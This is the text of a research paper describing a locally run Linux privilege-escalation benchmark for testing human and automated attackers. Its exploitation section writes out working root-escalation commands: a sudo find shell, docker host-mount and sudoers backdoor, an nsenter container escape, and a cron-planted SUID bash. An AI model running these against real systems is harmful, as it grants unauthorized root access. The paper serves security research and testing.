GOT ROOT? A LINUX PRIV-ESC BENCHMARK
ABSTRACT
arXiv:2405.02106v2 [cs.CR] 6 May 2024
1 INTRODUCTION
Linux systems are integral to the infrastructure of modern computing environments, necessitating
robust security measures to prevent unauthorized access. Privilege escalation attacks represent a
significant threat, typically allowing attackers to elevate their privileges from an initial low-privilege
account to the all-powerful root account.
Privilege-escalation attacks are typically performed manually by searching for exploitable configurations or vulnerable tools. The initial act of system reconnaissance, often named enumeration, is commonly automated through tools such as linpeas.sh1. Exploitation itself is typically performed manually by the, hopefully ethical, hacker.
A benchmark set of vulnerable systems is of high importance to evaluate the effectiveness of
privilege-escalation techniques performed by both humans and automated tooling. Analyzing attacker behavior on such systems allows defenders to better fortify the Linux systems entrusted to them and thus protect their infrastructure from potentially devastating attacks.
The benchmark’s use-case, i.e., testing the efficacy of malicious privilege escalation attacks against
Linux systems, leads to unique requirements:
• It should consist of Linux systems with provided low-privilege access, containing vulnera-
bilities that allow for root-level access.
• Given the sensitive use-case, i.e., attacking a system, the test-cases mandate strong security
boundaries, i.e., should be placed within virtual machines (VMs) to protect the security
of the host system. Using VMs additionally allows the inclusion of kernel-level vulnerabilities, e.g., DirtyC0W2, without compromising the security of the host system.
• The test machines should be deployed within a local network. The machines themselves should be able to run “air-gapped”, i.e., without an internet connection. Running malicious tools over public networks, e.g., against cloud instances, even when owned by the users themselves, is prohibited in some jurisdictions.
1 https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
2 https://github.com/firefart/dirtycow
Preprint
To the best of our knowledge, there exists no benchmark for evaluating Linux priv-esc capabilities
fulfilling the stated requirements.
During pen-tester education, Capture-the-Flag Tournaments (CTFs) are often used. These are simu-
lated test-cases, often placed within Virtual Machines, in which penetration-testers typically initially
try to break in, and subsequently elevate their privileges to the root level. While these CTF machines
would fulfill many of the stated requirements, they typically contain more than a single vulnerability.
Using these machines thus makes it difficult to precisely assess the efficacy of automated tooling in evaluation scenarios.
Training companies such as HackTheBox or TryHackMe provide cloud-based access to a steady
stream of CTF machines. Those machines have two drawbacks: (1) the test machines are offered through the cloud and are thus neither controllable by the evaluator nor compliant with our security requirements, and (2) CTF challenge machines change or degrade over time. Nobody can guarantee that a challenge machine stays the same over time, hindering the reproducibility of results.
While unsuited for direct use, the CTF ecosystem provides invaluable information about potential attack classes through training material provided by the respective companies as well as through third-party “walkthroughs” detailing attacks against outdated CTF machines.
To solve this, we designed a novel Linux priv-esc benchmark that can be executed locally and is therefore reproducible and air-gappable. To gain detailed insights into privilege-escalation capabilities, we introduce distinct test-cases that allow reasoning about attackers' capabilities for each distinct vulnerability class.
This section describes the selection process for our implemented vulnerabilities.
The benchmark consists of test cases, each of which allows the exploitation of a single specific
vulnerability class. We based the vulnerability classes upon vulnerabilities typically abused during
CTFs as well as on vulnerabilities covered by online priv-esc training platforms. Overall, we focused
on configuration vulnerabilities, not exploits for specific software versions. Recent research (Happe and Cito, 2023) indicates that configuration vulnerabilities are often searched for manually, while version-based exploits are often detected automatically. This indicates that improving the former would yield a larger real-world impact on pen-testers' productivity.
By analyzing TryHackMe's PrivEsc training module (Tib3rius), we identified the following vulnerability classes.
SUID and sudo-based vulnerabilities are based upon misconfigurations: the attacker is allowed to execute binaries through sudo, or can access binaries with the SUID bit set, and through them elevate their privileges. Pen-testers commonly search a collection of vulnerable binaries named GTFOBins (GTFOBins, 2024) to exploit these vulnerabilities. We do not implement advanced vulnerabilities that would require abusing the Unix environment, shared libraries, or bash features such as custom functions.
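The enumeration half of this class can be sketched as follows. The demo is self-contained: it sets the SUID bit on a copy of a harmless binary in a temporary directory instead of scanning the target's root filesystem (the file name suid-demo is purely illustrative):

```shell
# create a demo SUID binary in a temporary directory
demo=$(mktemp -d)
cp /bin/ls "$demo/suid-demo"
chmod u+s "$demo/suid-demo"

# the actual enumeration step: locate files with the SUID bit set;
# on a real target the search would start at / instead of "$demo":
#   find / -perm -4000 -type f 2>/dev/null
find "$demo" -perm -4000 -type f
```

Any hit that also appears in GTFOBins is a strong candidate for escalation.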
Cron-based vulnerabilities were implemented both with attackers being able to view root’s cron
spool directory (to analyze exploitable crontabs) as well as with inaccessible crontabs where the
attacker would have to derive that a script (named backup.cron.sh) in their home directory is utilized
by cron.
Information disclosure-based vulnerabilities allow attackers to extract the root password from sources such as stored text files, SSH keys, or the shell's history file.
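A minimal sketch of this hunt follows. The demo is self-contained: it writes a sample history file into a temporary directory rather than reading a real user's home, and the credential pattern is a simplified heuristic:

```shell
# create a sample shell history containing a leaked password
demo=$(mktemp -d)
printf 'ls -la\nmysql -u root -pS3cretPw\nssh [email protected]\n' \
  > "$demo/.bash_history"

# the actual hunt: grep credential-looking lines; on a real target the
# same search would cover ~/.bash_history, SSH keys, and text files
grep -i -E 'pass|pwd|-p[^ ]' "$demo/.bash_history"
```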
After analyzing HackTheBox’s Linux Privilege Escalation documentation (Hack The Box Ltd,
2024), we opted to add a docker-based test-case which would include both Privileged Groups
as well as Docker vulnerabilities.
We did not implement all of TryHackMe's vulnerabilities. We opted not to implement Weak File System Permissions, as world-writable /etc/passwd or /etc/shadow files are rarely encountered in this millennium and similar vulnerability classes are already covered by the information-disclosure test cases. NFS root squashing attacks require the attacker to have root access to a dedicated attacker box, which was deemed out of scope for the initial benchmark. Kernel Exploits are already well covered by existing tooling, e.g., linux-exploit-suggester2 (Donas). In addition, kernel-level exploits are often unstable and introduce system instabilities, and are thus not well-suited for a benchmark. We opted not to implement Service Exploits, as this vulnerability class is product-specific (a MySQL database).
The resulting vulnerability test-cases are detailed in Table 1. We discussed this selection with two professional penetration testers, who considered it representative of typical CTF challenges. The overall architecture of our benchmark allows the easy addition of further test-cases in the future.
MITRE ATT&CK is “a knowledge base of cyber adversary behavior and taxonomy for adversarial actions across their lifecycle”3, originally focusing on Microsoft Windows enterprise networks. Subsequent iterations also include Linux attack vectors.
3 https://attack.mitre.org/resources/faq/#other-models-faq
Our benchmark consists of common attack paths, according to CTF documentation. In contrast,
MITRE ATT&CK is an unordered taxonomy of potential attack vectors. In Table 2, benchmark
cases are mapped upon their corresponding MITRE techniques.
Recent research indicates that human hackers rely on intuition or checklists when searching for vulnerabilities (Happe and Cito, 2023). The mentioned checklists often consist of different vulnerability classes to test.
To allow emulation of this manual process, we introduce optional hints to each test case in our
benchmark that emulate going through a vulnerability class checklist, e.g., the hint for sudo binaries
is “there might be a sudo misconfiguration”. The hints are about the vulnerability class, not about a
concrete vulnerability. Iterating through multiple hints would thus emulate a human going through
a checklist of vulnerability classes. Currently implemented hints are provided in Table 3.
To allow for extensibility, the benchmark was implemented using well-known Unix administration tools. The virtual machines are provisioned using Vagrant and are based on standard Debian GNU/Linux distributions. Vulnerabilities are introduced into each VM using Ansible automation scripts. Ansible is also used to prepare a low-privilege account (“lowpriv”) and a high-privilege account (“root”), each with a standard password.
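With this setup, running a test case reduces to the standard Vagrant workflow; a sketch follows, in which the directory name is illustrative rather than the benchmark's actual layout:

```shell
cd vuln_suid_gtfobin   # hypothetical test-case directory
vagrant up             # create the Debian VM and apply the Ansible scripts
# ... attack the VM through the "lowpriv" account ...
vagrant destroy -f     # reset the machine to a pristine state
```

Destroying and re-creating the VM between runs is what makes results reproducible: every evaluation starts from an identical machine state.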
After describing the selection process and composition of the benchmark, we elaborate further upon
the benchmark itself and incorporate feedback from professional penetration testers.
During the enumeration phase of an attack, system information is gathered and used to identify
potential vulnerable configurations and components that are subsequently targeted through attacks.
Penetration testers commonly stress the importance of system enumeration for successful penetra-
tion testing.
Anecdotally speaking, the time effort to enumerate a system and subsequently identify a potential attack vector far exceeds the time effort for exploitation.
Automation in Linux privilege-escalation scenarios is focused on making system enumeration more
efficient. Tools such as linpeas.sh automate the often tedious tasks of gathering system information.
Analysis of the gathered information as well as its exploitation is typically performed manually.
This is a difference to the Windows ecosystem, where attack tooling oftentimes combines enumeration and exploitation, e.g., tools such as PowerUp.ps1 or SharpUp can both detect and exploit misconfigurations.
When analyzing the potential exploitation of the vulnerabilities contained within the benchmark, two distinct classes arise.
The first class consists of Single-Step Exploits, i.e., vulnerabilities that can be exploited by issuing a single command after successful identification during the enumeration phase. Example vulnerabilities and their respective exploitation are shown in Table 4.
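For instance, assuming enumeration revealed that the low-privilege user may run find via sudo (one of the GTFOBins entries; the concrete binary varies per test case), the whole exploit is one command:

```shell
# find's -exec spawns a shell that inherits sudo's root privileges;
# -quit stops the traversal after the first match
sudo find . -exec /bin/sh \; -quit
```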
In contrast, Multi-Step Exploits warrant the execution of multiple steps. Each step depends on the
successful execution of all prior steps. One example of such a vulnerability would be the vuln docker
test-case in which the low-priv user is allowed to execute high-privileged Docker containers. In such a scenario, the attacker would initially start a new container that mounts the host filesystem with write access and subsequently modify the host filesystem to give the user elevated access rights. We show an example of such an exploit in the following.
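A sketch of this multi-step exploitation, assuming the alpine image is available locally and using a passwordless-sudo entry as the (illustrative) backdoor:

```shell
# step 1 (host): start a container mounting the host filesystem
# with write access
docker run -v /:/mnt --rm -it alpine /bin/sh

# step 2 (inside the container): grant lowpriv passwordless sudo by
# appending to the host's sudoers file
echo 'lowpriv ALL=(ALL) NOPASSWD: ALL' >> /mnt/etc/sudoers

# step 3 (host, after exiting the container): use the backdoor
sudo /bin/bash
```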
Please note that the same scenario could also be exploited in a single step by abusing missing namespace separation:
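A sketch of this single-step variant; it assumes an image whose busybox build ships nsenter (alpine's typically does):

```shell
# a privileged container sharing the host's PID namespace can join
# the namespaces of PID 1 and spawn a root shell on the host
docker run --rm -it --privileged --pid=host alpine \
  nsenter -t 1 -m -u -n -i /bin/sh
```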
The benchmark suite also includes multiple scenarios utilizing timed tasks, i.e., cron tasks, in Linux
systems. While the prior multi-step exploitation examples had a causal ordering, cron-based exploits
also include a temporal component: in an initial step, the attacker places malicious code that will
subsequently be called by the cron process with elevated privileges. When this malicious code is
executed, it changes the system configuration and creates a backdoor that allows the attacker to
elevate their privileges. The attacker typically has to periodically check if the malicious code has
already been executed and try to elevate their privileges. Oftentimes, the attacker does not know
when or if the malicious code is executed, but has to use educated guesses about potential execution
times, e.g., that a backup script will typically be called outside of typical office hours.
The scenario cron calling user file or cron calling user file cron visible could be abused by the
following commands:
# place code that adds a new SUID binary to the system
# when called through cron
printf '#!/bin/bash\ncp /usr/bin/bash /home/bash\nchmod +s /home/bash\n' \
  > /home/lowpriv/backup.cron.sh
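Because the attacker cannot trigger cron directly, exploitation typically ends in a polling loop; a sketch follows (the 30-second interval is arbitrary):

```shell
# wait until the cron job has produced the SUID shell, then use it;
# test -u checks the SUID bit, and bash -p preserves the effective
# root uid granted by that bit
while [ ! -u /home/bash ]; do
  sleep 30
done
/home/bash -p
```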
4 CONCLUSION
We curated a new Linux privilege-escalation benchmark and elaborated on the decisions that led to its creation. We further detailed particularities about the enumeration and exploitation of Linux-based systems that are mirrored within our benchmark.
As the benchmark is released as open source on GitHub and built with standard Linux system administration tools, we enable third parties to easily extend it with additional attack classes or with more scenarios for our initially identified attack classes.
DATA AVAILABILITY
The benchmark suite has been published at github.com/ipa-lab/benchmark-privesc-linux.
REFERENCES
Jonathan Donas. Linux exploit suggester 2. https://github.com/jondonas/linux-exploit-suggester-2. Accessed: 2024-03-11.
GTFOBins. Gtfobins. https://gtfobins.github.io/, 2024. Accessed: 2024-03-11.
Hack The Box Ltd. HackTheBox Academy: Linux privilege escalation. https://academy.hackthebox.com/course/preview/linux-privilege-escalation, 2024. Accessed: 2024-03-11.
Andreas Happe and Jürgen Cito. Understanding hackers’ work: An empirical study of offensive
security practitioners. In Proceedings of the 31st ACM Joint European Software Engineering
Conference and Symposium on the Foundations of Software Engineering, ESEC/FSE 2023, New
York, NY, USA, 2023. Association for Computing Machinery.
Tib3rius. Tryhackme: Linux privesc. https://tryhackme.com/room/linuxprivesc.
Accessed: 2024-03-11.